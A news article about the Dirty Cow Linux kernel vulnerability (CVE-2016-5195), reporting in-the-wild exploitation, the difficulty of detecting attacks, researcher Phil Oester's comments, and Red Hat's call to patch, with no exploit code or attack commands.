The Dirty Cow Linux kernel security flaw (CVE-2016-5195) discovered by a security researcher at software vendor Red Hat is being actively exploited in the wild. The discovery has prompted Red Hat to issue a stern warning to Linux administrators to patch the flaw immediately. Failure to do so could see the vulnerability exploited.
Unfortunately, should the Dirty Cow Linux kernel security flaw be exploited, it may be hard to detect because it is is difficult to differentiate between legitimate use and an attack. Currently anti-virus software is unlikely to detect Dirty Cow. Even if signatures are developed, they are only likely to be able to detect an attack when one occurs. They would be unlikely to be able to block an attack.
The flaw has been around for around 9 years. It was given the name ‘dirty cow’ due to the way the Linux kernel’s memory subsystem handles copy-on-write breakage of read-only memory mappings.
Some of the attacks that have been identified have been highly complex. That said, the flaw itself is simple to exploit. The Linux security researcher who discovered the vulnerability, Phil Oester, said exploiting the flaw is “trivial” and pointed out that the exploit seen in the wild “never fails”. Oester uncovered an exploit for the bug and was able to test it out in a sandbox.
As Oester explains, “An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”
Due to the ease at which the exploit can be used Oester believes it is likely to be used much more extensively to attack unpatched systems in the future. The Red Hat fix for the problem can be used to block the current exploit that is being used in the wild, although it does not address the flaw itself. Further exploits could potentially be developed.